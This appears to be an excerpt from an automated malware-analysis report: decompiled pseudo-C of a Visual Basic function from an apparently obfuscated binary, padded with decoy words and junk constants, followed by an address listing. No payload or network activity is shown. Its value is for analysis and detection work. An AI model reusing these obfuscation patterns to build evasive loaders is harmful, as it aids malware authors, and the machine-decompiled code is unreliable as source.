62->63 66 41d3af 63->66 67 41d38f-41d3ad __vbaHresultCheckObj 63->67 68 41d3b6-41d40f __vbaFreeStr __vbaFreeVar __vbaLenBstr 66->68 67->68 70 41d431 68->70 71 41d411-41d42f __vbaHresultCheckObj 68->71 72 41d438-41d506 #525 __vbaStrMove #618 __vbaStrMove * 2 __vbaStrCopy __vbaStrMove 70->72 71->72 74 41d528 72->74 75 41d508-41d526 __vbaHresultCheckObj 72->75 76 41d52f-41d58f __vbaStrMove __vbaFreeStrList 74->76 75->76 77 41d595-41d5bf #564 76->77 78 41d907 76->78 79 41d5c1-41d5d2 __vbaHresultCheck 77->79 80 41d5d4 77->80 78->78 81 41d5db-41d6a7 #541 __vbaStrVarVal #519 __vbaStrMove #648 __vbaStrMove __vbaI4Var 79->81 80->81 83 41d6c9 81->83 84 41d6a9-41d6c7 __vbaHresultCheckObj 81->84 85 41d6d0-41d801 __vbaFreeStrList __vbaFreeVarList #696 * 2 __vbaStrCopy call 420fbc __vbaFreeStr call 421223 __vbaVarMove * 2 __vbaVarIdiv __vbaI4Var 83->85 84->85 89 41d80a-41d8e7 __vbaFreeVar __vbaFreeStr __vbaAryDestruct __vbaFreeStr * 4 __vbaFreeVar __vbaFreeStr 85->89
      C-Code - Quality: 71%
      			E0041C254(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				void* _v48;
				short _v52;
				short* _v64;
				char _v76;
				short _v84;
				void* _v88;
				short _v92;
				void* _v96;
				intOrPtr _v100;
				short _v104;
				void* _v108;
				void* _v112;
				char _v128;
				short _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				char _v168;
				long long _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				intOrPtr _v208;
				char _v216;
				intOrPtr _v224;
				char _v232;
				long long _v240;
				char _v248;
				char _v264;
				char* _v272;
				char _v280;
				char _v332;
				signed int _v336;
				signed int _v340;
				void* _v344;
				signed int _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				long long _v368;
				long long _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				char* _t658;
				signed short _t659;
				signed int _t671;
				char* _t675;
				short _t676;
				short _t685;
				short _t695;
				signed int _t704;
				signed int _t707;
				signed int _t708;
				signed int _t712;
				char* _t713;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t731;
				signed int _t732;
				signed int _t737;
				signed int _t738;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				char* _t747;
				signed int _t761;
				signed int* _t762;
				signed int _t771;
				char* _t772;
				char* _t776;
				signed int _t780;
				signed int _t797;
				signed int _t802;
				char* _t808;
				char* _t819;
				signed int _t822;
				signed int _t827;
				signed int* _t832;
				signed int _t836;
				signed char _t842;
				signed int _t845;
				char* _t848;
				signed int _t849;
				char* _t853;
				char* _t854;
				signed int _t857;
				signed int _t865;
				char* _t874;
				signed int* _t879;
				short _t882;
				signed int _t883;
				signed int _t885;
				signed int _t887;
				signed int _t889;
				char* _t891;
				short _t892;
				signed int _t897;
				signed int _t899;
				signed int _t901;
				short _t903;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t915;
				signed int _t921;
				signed int _t926;
				char* _t932;
				signed int _t989;
				signed int _t999;
				signed int _t1004;
				signed int _t1010;
				signed int _t1015;
				void* _t1065;
				void* _t1067;
				intOrPtr _t1068;
				void* _t1069;
				void* _t1070;
				void* _t1082;
				long long _t1086;

				_t1068 = _t1067 - 0xc;
				 *[fs:0x0] = _t1068;
				L00401540();
				_v16 = _t1068;
				_v12 = 0x401260;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
				_push(2);
				_push(0x4029b8);
				_push( &_v76);
				L0040186A();
				_v272 = L"Hjortens";
				_v280 = 8;
				L0040184C();
				_push( &_v184);
				_push( &_v200);
				L00401852();
				_push( &_v200);
				_t658 =  &_v144;
				_push(_t658);
				L00401858();
				_push(_t658);
				L0040185E();
				_v208 = _t658;
				_v216 = 8;
				_t659 =  &_v216;
				_push(_t659);
				L00401864();
				asm("sbb eax, eax");
				_v380 =  ~( ~_t659 + 1);
				_t932 =  &_v144;
				L00401846();
				_push( &_v216);
				_push( &_v200);
				_push( &_v184);
				_push(3);
				L00401840();
				_t1069 = _t1068 + 0x10;
				if(_v380 != 0) {
					_push(L"7:7:7");
					__eax =  &_v184;
					_push( &_v184); // executed
					L0040182E(); // executed
					__eax =  &_v184;
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
					_v272 = L"Readjust";
					_v280 = 8;
					L0040184C();
					__eax =  &_v184;
					_push( &_v184);
					__eax =  &_v200;
					_push( &_v200);
					L0040181C();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v144;
					L00401858();
					_push(L"CANNIBALEAN");
					_push(L"Bursati");
					_push(L"multivalent"); // executed
					L00401822(); // executed
					L00401846();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v184;
					_push( &_v184);
					_push(2);
					L00401840();
					__esp = __esp + 0xc;
				}
				_push( &_v184);
				L0040180A();
				_push( &_v184);
				_t1082 =  *0x401258;
				_push(_t932);
				_push(_t932);
				_v92 = _t1082;
				_push(0x402528);
				_push( &_v200);
				L00401810();
				_v272 = 0xfffffff9;
				_v280 = 0x8002;
				_push( &_v200);
				_t671 =  &_v280;
				_push(_t671);
				L00401816();
				_v380 = _t671;
				_push( &_v200);
				_push( &_v184);
				_push(2);
				L00401840();
				_t1070 = _t1069 + 0xc;
				if(_v380 != 0) {
					_v176 = 1;
					_v184 = 2;
					_push(0);
					_push( &_v184);
					L00401804();
					L0040183A();
					L00401828();
					_push( &_v184);
					L004017FE();
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
				}
				_v272 = L"replicr";
				_v280 = 8;
				L0040184C();
				_t675 =  &_v184;
				_push(_t675);
				L004017F8();
				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
				L00401828();
				_t676 = _v380;
				if(_t676 != 0) {
					 *_v64 = 0x579;
					 *((short*)(_v64 + 2)) = 0x23c6;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t882 =  &_v184;
					_push(_t882);
					L004017F2();
					_t989 = 2;
					 *((short*)(_v64 + (_t989 << 1))) = _t882;
					L00401828();
					_t883 = 2;
					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
					_t885 = 2;
					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
					_t887 = 2;
					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
					_t889 = 2;
					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
					_v272 = 0x402544;
					_v280 = 8;
					L0040184C();
					_t891 =  &_v184;
					_push(_t891);
					_push(0x10);
					L004017DA();
					L0040183A();
					_push(_t891);
					L004017E0();
					_v192 = _t891;
					_v200 = 3;
					_t892 =  &_v200;
					_push(_t892);
					L004017E6();
					L0040183A();
					_push(_t892);
					L004017EC();
					_t999 = 2;
					 *((short*)(_v64 + _t999 * 7)) = _t892;
					_push( &_v148);
					_push( &_v144);
					_push(2);
					L004017D4();
					_push( &_v200);
					_push( &_v184);
					_push(2);
					L00401840();
					_t1070 = _t1070 + 0x18;
					_t897 = 2;
					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
					_t899 = 2;
					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
					_t901 = 2;
					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t903 =  &_v184;
					_push(_t903);
					L004017F2();
					_t1004 = 2;
					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
					L00401828();
					_t904 = 2;
					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
					_t906 = 2;
					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
					_t908 = 2;
					_t909 = _t908 * 0xe;
					 *((short*)(_v64 + _t909)) = 0x34bb;
					_push(L"OFFENTLIGHEDSSFRE");
					L004017EC();
					_t1010 = 2;
					 *(_v64 + _t1010 * 0xf) = _t909;
					_t910 = 2;
					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
					_t912 = 2;
					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
					_t914 = 2;
					_t915 = _t914 * 0x12;
					 *((short*)(_v64 + _t915)) = 0x6a6e;
					_push(L"Dagvagten");
					L004017EC();
					_t1015 = 2;
					 *(_v64 + _t1015 * 0x13) = _t915;
					if( *0x4223c0 != 0) {
						_v436 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v436 = 0x4223c0;
					}
					_v380 =  *_v436;
					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
					asm("fclex");
					_v384 = _t921;
					if(_v384 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v380);
						_push(_v384);
						L004017C8();
						_v440 = _t921;
					}
					_v388 = _v168;
					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
					asm("fclex");
					_v392 = _t926;
					if(_v392 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025b8);
						_push(_v388);
						_push(_v392);
						L004017C8();
						_v444 = _t926;
					}
					_t676 = _v332;
					_v104 = _t676;
					L004017C2();
				}
				L004017BC();
				L0040183A();
				L004017BC();
				L0040183A();
				_v404 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
				L004017D4();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t685 =  &_v184;
				L004017F2();
				_v344 = _t685;
				_v336 = 0x6988;
				L004017B6();
				_v348 = 0x10e914;
				_v332 = _v344;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
				_t695 = _v340;
				_v52 = _t695;
				L00401846();
				L00401828();
				_v348 = 0x40f600;
				L004017B0();
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
				L00401846();
				L004017B6();
				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
				_v380 = _t704;
				if(_v380 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v448 = _t704;
				}
				_v408 = _v148;
				_v148 = _v148 & 0x00000000;
				L0040183A();
				L00401846();
				L004017AA();
				_v368 = _t1082;
				_v176 = _v368;
				_v184 = 4;
				_push( &_v200);
				_t707 =  &_v184;
				_push(_t707);
				L004017A4();
				_v380 = _t707;
				if(_v380 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v452 = _t707;
				}
				L00401792();
				_t708 =  &_v168;
				L00401798();
				_v384 = _t708;
				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
				asm("fclex");
				_v388 = _t712;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402658);
					_push(_v384);
					_push(_v388);
					L004017C8();
					_v456 = _t712;
				}
				_v364 = 0xed488;
				_v360 = 0x711cb2;
				_t713 =  &_v200;
				L0040178C();
				_v356 = _t713;
				_v352 = 0x23dec;
				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
				_v392 = _t720;
				if(_v392 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402348);
					_push(_a4);
					_push(_v392);
					L004017C8();
					_v460 = _t720;
				}
				L004017C2();
				_t722 =  &_v184;
				L00401840();
				L00401786();
				L0040183A();
				L004017EC();
				_v340 = _t722;
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t723 =  &_v184;
				L004017F2();
				_v344 = _t723;
				L00401780();
				_v348 = _t723;
				_v336 = _v344;
				_v332 = _v340;
				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
				_v380 = _t731;
				if(_v380 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v464 = _t731;
				}
				L00401846();
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t732 =  &_v184;
				L004017F2();
				_v336 = _t732;
				_v332 = _v336;
				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
				_v380 = _t737;
				if(_v380 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v468 = _t737;
				}
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t738 =  &_v184;
				_push(_t738);
				L004017F2();
				_v336 = _t738;
				_v192 =  *0x40124c;
				_v200 = 4;
				_push(0);
				_push( &_v200);
				_push( &_v216);
				L0040177A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t741 =  &_v232;
				_push(_t741);
				L004017F2();
				_v340 = _t741;
				_t1086 =  *0x401248;
				_v240 = _t1086;
				_v248 = 4;
				_push( &_v264);
				_t743 =  &_v248;
				_push(_t743);
				L004017A4();
				_v380 = _t743;
				if(_v380 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v472 = _t743;
				}
				_v332 = _v340;
				_v352 = 0x1eaaee;
				_t745 =  &_v216;
				L0040178C();
				_v348 = _t745;
				_t747 =  &_v264;
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
				_v136 = _v356;
				L00401840();
				L00401774();
				_v376 = _t1086;
				L0040185E();
				L0040183A();
				_t761 = _v156;
				_v412 = _t761;
				_v156 = _v156 & 0x00000000;
				L0040176E();
				_v348 = _t761;
				L004017B6();
				_t762 =  &_v152;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
				_v416 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				_t771 =  &_v144;
				L004017D4();
				L004017EC();
				_v336 = _t771;
				_v176 = 0x1ca534;
				_v184 = 3;
				_t772 =  &_v184;
				L004017E6();
				L0040183A();
				L00401768();
				_v352 = _t772;
				_v332 = _v336;
				_v348 = 0x761fa7;
				_t776 =  &_v332;
				L00401762();
				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
				_v380 = _t780;
				if(_v380 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v476 = _t780;
				}
				L00401846();
				L00401828();
				L004017EC();
				_v340 = _t780;
				_v332 = 0x640;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
				_v132 = _v336;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
				_v84 = _v332;
				_v336 = 0x393d;
				_v332 = 0x67ff;
				L004017B6();
				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
				_v380 = _t797;
				if(_v380 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v480 = _t797;
				}
				L00401846();
				_v352 = 0x419a61;
				_v348 = 0x5ea767;
				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
				_v380 = _t802;
				if(_v380 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v484 = _t802;
				}
				_v272 = 0x40284c;
				_v280 = 8;
				L0040184C();
				L0040175C();
				L00401834();
				L0040183A();
				L004017B6();
				_v336 = 0x54f7;
				_v332 = 0x147e;
				_t808 =  &_v144;
				L00401762();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
				_v44 = _v348;
				L004017D4();
				L00401840();
				_v176 = 0xfffffff6;
				_v184 = 2;
				_t819 =  &_v184;
				L00401804();
				L0040183A();
				L00401762();
				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
				_v380 = _t822;
				if(_v380 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v488 = _t822;
				}
				L00401846();
				L00401828();
				L004017E0();
				_v348 = _t822;
				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
				_v380 = _t827;
				if(_v380 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v492 = _t827;
				}
				_v100 = _v352;
				L00401756();
				L0040183A();
				L00401750();
				L0040183A();
				_v420 = _v164;
				_v164 = _v164 & 0x00000000;
				L0040183A();
				_v424 = _v160;
				_v160 = _v160 & 0x00000000;
				L004017B6();
				_t832 =  &_v152;
				L0040183A();
				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
				_v380 = _t836;
				if(_v380 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x402348);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v496 = _t836;
				}
				_v428 = _v156;
				_v156 = _v156 & 0x00000000;
				L0040183A();
				_push( &_v164);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_t842 =  &_v144;
				_push(_t842);
				_push(5);
				L004017D4();
				asm("fabs");
				_v176 =  *0x401238;
				asm("fnstsw ax");
				if((_t842 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v184 = 5;
				_push( &_v200);
				_t845 =  &_v184;
				_push(_t845);
				L004017A4();
				_v380 = _t845;
				if(_v380 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v500 = _t845;
				}
				L0040182E();
				_t848 =  &_v144;
				L00401858();
				L004017BC();
				L0040183A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t849 =  &_v232;
				L004017F2();
				_v340 = _t849;
				_v332 = _v340;
				_v432 = _v152;
				_v152 = _v152 & 0x00000000;
				_t853 =  &_v332;
				L0040183A();
				_t854 =  &_v200;
				L0040178C();
				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
				_v384 = _t857;
				if(_v384 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x402348);
					_push(_a4);
					_push(_v384);
					L004017C8();
					_v504 = _t857;
				}
				_v92 = _v336;
				L004017D4();
				_t865 =  &_v184;
				L00401840();
				L004017EC();
				_v336 = _t865;
				L004017EC();
				_v340 = _t865;
				L004017B6();
				_v332 = 0x2885;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x402954, 0x40290c, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
				L00401846();
				E00421223();
				_v272 = 2;
				_v280 = 2;
				L0040174A();
				_v272 = 0x806dae;
				_v280 = 3;
				L0040174A();
				_t874 =  &_v184;
				L00401744();
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
				_v8 = 0;
				asm("wait");
				_push(0x41d8e8);
				L00401828();
				L00401846();
				_v348 =  &_v76;
				_t879 =  &_v348;
				_push(_t879);
				_push(0);
				L0040173E();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t879;
			}






































































































































































      0x0041c257
      0x0041c266
      0x0041c272
      0x0041c27a
      0x0041c27d
      0x0041c28a
      0x0041c293
      0x0041c29e
      0x0041c2a1
      0x0041c2a3
      0x0041c2ab
      0x0041c2ac
      0x0041c2b1
      0x0041c2bb
      0x0041c2d1
      0x0041c2dc
      0x0041c2e3
      0x0041c2e4
      0x0041c2ef
      0x0041c2f0
      0x0041c2f6
      0x0041c2f7
      0x0041c2fc
      0x0041c2fd
      0x0041c302
      0x0041c308
      0x0041c312
      0x0041c318
      0x0041c319
      0x0041c321
      0x0041c326
      0x0041c32d
      0x0041c333
      0x0041c33e
      0x0041c345
      0x0041c34c
      0x0041c34d
      0x0041c34f
      0x0041c354
      0x0041c360
      0x0041c366
      0x0041c36b
      0x0041c371
      0x0041c372
      0x0041c377
      0x0041c37d
      0x0041c37e
      0x0041c388
      0x0041c393
      0x0041c398
      0x0041c3a2
      0x0041c3b8
      0x0041c3bd
      0x0041c3c3
      0x0041c3c4
      0x0041c3ca
      0x0041c3cb
      0x0041c3d0
      0x0041c3d6
      0x0041c3d7
      0x0041c3de
      0x0041c3e4
      0x0041c3e9
      0x0041c3ee
      0x0041c3f3
      0x0041c3fe
      0x0041c403
      0x0041c409
      0x0041c40a
      0x0041c410
      0x0041c411
      0x0041c413
      0x0041c418
      0x0041c418
      0x0041c421
      0x0041c422
      0x0041c42d
      0x0041c42e
      0x0041c434
      0x0041c435
      0x0041c436
      0x0041c439
      0x0041c444
      0x0041c445
      0x0041c44a
      0x0041c454
      0x0041c464
      0x0041c465
      0x0041c46b
      0x0041c46c
      0x0041c471
      0x0041c47e
      0x0041c485
      0x0041c486
      0x0041c488
      0x0041c48d
      0x0041c499
      0x0041c49b
      0x0041c4a5
      0x0041c4af
      0x0041c4b7
      0x0041c4b8
      0x0041c4c2
      0x0041c4cd
      0x0041c4d8
      0x0041c4d9
      0x0041c4e4
      0x0041c4e5
      0x0041c4ef
      0x0041c4fa
      0x0041c4fa
      0x0041c4ff
      0x0041c509
      0x0041c51f
      0x0041c524
      0x0041c52a
      0x0041c52b
      0x0041c53b
      0x0041c548
      0x0041c54d
      0x0041c556
      0x0041c55f
      0x0041c567
      0x0041c56d
      0x0041c577
      0x0041c581
      0x0041c587
      0x0041c588
      0x0041c58f
      0x0041c595
      0x0041c59f
      0x0041c5a6
      0x0041c5ad
      0x0041c5b5
      0x0041c5bc
      0x0041c5c4
      0x0041c5cb
      0x0041c5d3
      0x0041c5da
      0x0041c5e0
      0x0041c5ea
      0x0041c600
      0x0041c605
      0x0041c60b
      0x0041c60c
      0x0041c60e
      0x0041c61b
      0x0041c620
      0x0041c621
      0x0041c626
      0x0041c62c
      0x0041c636
      0x0041c63c
      0x0041c63d
      0x0041c64a
      0x0041c64f
      0x0041c650
      0x0041c657
      0x0041c65e
      0x0041c668
      0x0041c66f
      0x0041c670
      0x0041c672
      0x0041c680
      0x0041c687
      0x0041c688
      0x0041c68a
      0x0041c68f
      0x0041c694
      0x0041c69b
      0x0041c6a3
      0x0041c6aa
      0x0041c6b2
      0x0041c6b9
      0x0041c6bf
      0x0041c6c9
      0x0041c6d3
      0x0041c6d9
      0x0041c6da
      0x0041c6e1
      0x0041c6e8
      0x0041c6f2
      0x0041c6f9
      0x0041c700
      0x0041c708
      0x0041c70f
      0x0041c717
      0x0041c718
      0x0041c71e
      0x0041c724
      0x0041c729
      0x0041c730
      0x0041c737
      0x0041c73d
      0x0041c744
      0x0041c74c
      0x0041c753
      0x0041c75b
      0x0041c75c
      0x0041c762
      0x0041c768
      0x0041c76d
      0x0041c774
      0x0041c77b
      0x0041c786
      0x0041c7a3
      0x0041c788
      0x0041c788
      0x0041c78d
      0x0041c792
      0x0041c797
      0x0041c797
      0x0041c7b5
      0x0041c7d0
      0x0041c7d3
      0x0041c7d5
      0x0041c7e2
      0x0041c804
      0x0041c7e4
      0x0041c7e4
      0x0041c7e6
      0x0041c7eb
      0x0041c7f1
      0x0041c7f7
      0x0041c7fc
      0x0041c7fc
      0x0041c811
      0x0041c82c
      0x0041c82f
      0x0041c831
      0x0041c83e
      0x0041c860
      0x0041c840
      0x0041c840
      0x0041c842
      0x0041c847
      0x0041c84d
      0x0041c853
      0x0041c858
      0x0041c858
      0x0041c867
      0x0041c86e
      0x0041c878
      0x0041c878
      0x0041c882
      0x0041c88f
      0x0041c895
      0x0041c8a2
      0x0041c8ad
      0x0041c8b3
      0x0041c8c6
      0x0041c8e9
      0x0041c906
      0x0041c90e
      0x0041c918
      0x0041c922
      0x0041c929
      0x0041c92e
      0x0041c935
      0x0041c949
      0x0041c94e
      0x0041c95f
      0x0041c996
      0x0041c99c
      0x0041c9a3
      0x0041c9ad
      0x0041c9b8
      0x0041c9bd
      0x0041c9cc
      0x0041c9d9
      0x0041c9ee
      0x0041c9fa
      0x0041ca0a
      0x0041ca2a
      0x0041ca30
      0x0041ca3d
      0x0041ca5f
      0x0041ca3f
      0x0041ca3f
      0x0041ca44
      0x0041ca49
      0x0041ca4c
      0x0041ca52
      0x0041ca57
      0x0041ca57
      0x0041ca6c
      0x0041ca72
      0x0041ca82
      0x0041ca8d
      0x0041ca92
      0x0041ca97
      0x0041caa3
      0x0041caa9
      0x0041cab9
      0x0041caba
      0x0041cac0
      0x0041cac1
      0x0041cac6
      0x0041cad3
      0x0041cae8
      0x0041cad5
      0x0041cad5
      0x0041cadb
      0x0041cae0
      0x0041cae0
      0x0041caef
      0x0041caf5
      0x0041cafc
      0x0041cb01
      0x0041cb1c
      0x0041cb1f
      0x0041cb21
      0x0041cb2e
      0x0041cb50
      0x0041cb30
      0x0041cb30
      0x0041cb32
      0x0041cb37
      0x0041cb3d
      0x0041cb43
      0x0041cb48
      0x0041cb48
      0x0041cb57
      0x0041cb61
      0x0041cb6b
      0x0041cb72
      0x0041cb77
      0x0041cb7d
      0x0041cbb6
      0x0041cbbc
      0x0041cbc9
      0x0041cbeb
      0x0041cbcb
      0x0041cbcb
      0x0041cbd0
      0x0041cbd5
      0x0041cbd8
      0x0041cbde
      0x0041cbe3
      0x0041cbe3
      0x0041cbf8
      0x0041cc04
      0x0041cc0d
      0x0041cc1a
      0x0041cc27
      0x0041cc2d
      0x0041cc32
      0x0041cc39
      0x0041cc43
      0x0041cc4d
      0x0041cc54
      0x0041cc59
      0x0041cc66
      0x0041cc6b
      0x0041cc78
      0x0041cc86
      0x0041ccb4
      0x0041ccba
      0x0041ccc7
      0x0041cce9
      0x0041ccc9
      0x0041ccc9
      0x0041ccce
      0x0041ccd3
      0x0041ccd6
      0x0041ccdc
      0x0041cce1
      0x0041cce1
      0x0041ccf6
      0x0041cd01
      0x0041cd06
      0x0041cd10
      0x0041cd1a
      0x0041cd21
      0x0041cd26
      0x0041cd34
      0x0041cd4f
      0x0041cd55
      0x0041cd62
      0x0041cd84
      0x0041cd64
      0x0041cd64
      0x0041cd69
      0x0041cd6e
      0x0041cd71
      0x0041cd77
      0x0041cd7c
      0x0041cd7c
      0x0041cd91
      0x0041cd96
      0x0041cda0
      0x0041cdaa
      0x0041cdb0
      0x0041cdb1
      0x0041cdb6
      0x0041cdc3
      0x0041cdc9
      0x0041cdd3
      0x0041cddb
      0x0041cde2
      0x0041cde3
      0x0041cde8
      0x0041cdf2
      0x0041cdfc
      0x0041ce02
      0x0041ce03
      0x0041ce08
      0x0041ce0f
      0x0041ce15
      0x0041ce1b
      0x0041ce2b
      0x0041ce2c
      0x0041ce32
      0x0041ce33
      0x0041ce38
      0x0041ce45
      0x0041ce5a
      0x0041ce47
      0x0041ce47
